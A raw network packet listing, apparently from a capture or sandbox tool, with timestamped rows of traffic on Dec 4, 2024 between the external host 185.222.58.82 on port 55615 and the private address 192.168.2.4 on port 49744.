Dec 4, 2024 13:17:30.135776997 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135785103 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.135808945 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135828018 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135833979 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.135848045 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135865927 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.135865927 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135885954 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.135909081 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.135929108 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.135967970 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136024952 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.136044025 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136110067 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.136127949 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136163950 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136181116 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.136204958 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136233091 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136310101 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.136406898 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136444092 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.136475086 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.136590958 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136600971 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136666059 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.136857986 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136868954 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136877060 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.136955976 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.137151957 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.137214899 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.137285948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.137345076 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.137382984 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.137444019 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.137471914 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.137526989 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.137681007 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.137722969 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.137742043 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.137784004 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.180150986 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.180227041 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.211967945 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.212049007 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.255767107 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.255883932 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.256104946 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.256184101 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.256604910 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.256936073 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.256946087 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257006884 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257015944 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257049084 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257076979 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257095098 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257128954 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257148027 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257153034 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257164001 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257201910 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257214069 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257328033 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257337093 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257364035 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257373095 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257385969 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257427931 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257428885 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257450104 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257456064 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257471085 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257508039 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257543087 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257553101 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257605076 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257656097 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257666111 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257714033 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257735014 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257745981 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257798910 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.257803917 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257875919 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257885933 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.257937908 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.258141994 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.258151054 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.258158922 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.258162975 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.258171082 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.258179903 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.258188009 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.258197069 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.258255959 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.300061941 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.304025888 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.331978083 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.332253933 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.332349062 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.376225948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.376250029 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.376291990 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.376302004 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.376319885 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.376341105 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.376346111 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.376364946 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.376393080 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.376948118 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.376959085 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.377015114 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.377038002 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.377048969 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.377094030 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.377644062 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.377691984 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.377729893 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.377741098 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.377753019 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.377799034 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.377825022 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.377834082 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.377890110 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.378245115 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.378266096 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.378302097 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.378335953 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.378370047 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.378412962 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.378460884 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.378976107 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.378987074 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379040956 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.379437923 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379461050 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379530907 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.379544020 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379606962 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.379652977 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379663944 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379673004 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379715919 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.379735947 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379738092 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.379760027 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379802942 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.379807949 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.379859924 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.380325079 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.380351067 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.380405903 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.380511999 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.380599022 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.380652905 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.380655050 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.381248951 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381302118 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.381335974 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381453991 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381498098 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381513119 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.381552935 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.381688118 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381741047 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.381751060 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381795883 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.381890059 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381900072 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381932020 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.381952047 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.381982088 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.382344961 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.382355928 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.382411957 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.382531881 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.382551908 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.382596016 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.382915974 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.382936954 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.382982969 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.383013010 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.383168936 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.383229017 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.383742094 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.383753061 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.383797884 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.385603905 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.385612965 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.385632038 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.385641098 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.385673046 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.385703087 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.386570930 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.386580944 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.386599064 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.386609077 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.386641979 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.386661053 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.387552023 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.387562037 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.387617111 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.387626886 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.387662888 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.387674093 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.387677908 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.387721062 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.387737989 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.389221907 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.389245987 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.389259100 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.389291048 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.389297009 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.389307022 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.389333010 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.389348030 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.389394999 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.390176058 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390187025 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390250921 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.390321016 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390331984 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390397072 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.390409946 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390458107 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.390656948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390667915 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390697002 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390718937 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.390748978 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.390822887 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.390868902 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391014099 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391022921 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391072035 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391082048 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391092062 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391123056 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391138077 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391141891 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391163111 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391172886 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391190052 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391208887 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391221046 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391222954 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391258001 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391278982 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391288996 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391289949 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391308069 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391335011 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391357899 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391364098 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391375065 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391417980 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391473055 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391483068 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391494036 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391532898 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391555071 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391634941 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391644955 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391654015 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391694069 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391700029 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391704082 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391726017 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391741991 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391766071 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391773939 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391776085 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391822100 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391853094 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391865015 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391889095 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.391911983 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.391937971 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.423894882 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.423964977 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.424021959 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.424083948 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.452197075 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.452219963 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.452294111 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.452303886 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.452308893 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.452373981 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496159077 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496190071 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496229887 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496273041 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496299028 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496309042 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496337891 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496357918 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496380091 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496391058 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496436119 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496483088 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496494055 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496541977 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496560097 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496594906 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496613979 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496638060 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496788025 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496836901 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496844053 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496893883 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.496988058 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.496998072 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497052908 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497072935 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497081995 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497092962 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497121096 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497143030 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497169018 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497221947 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497383118 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497440100 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497548103 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497600079 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497612953 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497648001 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497667074 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497688055 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.497695923 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.497724056 CET	55615	49744	185.222.58.82	192.168.2.4
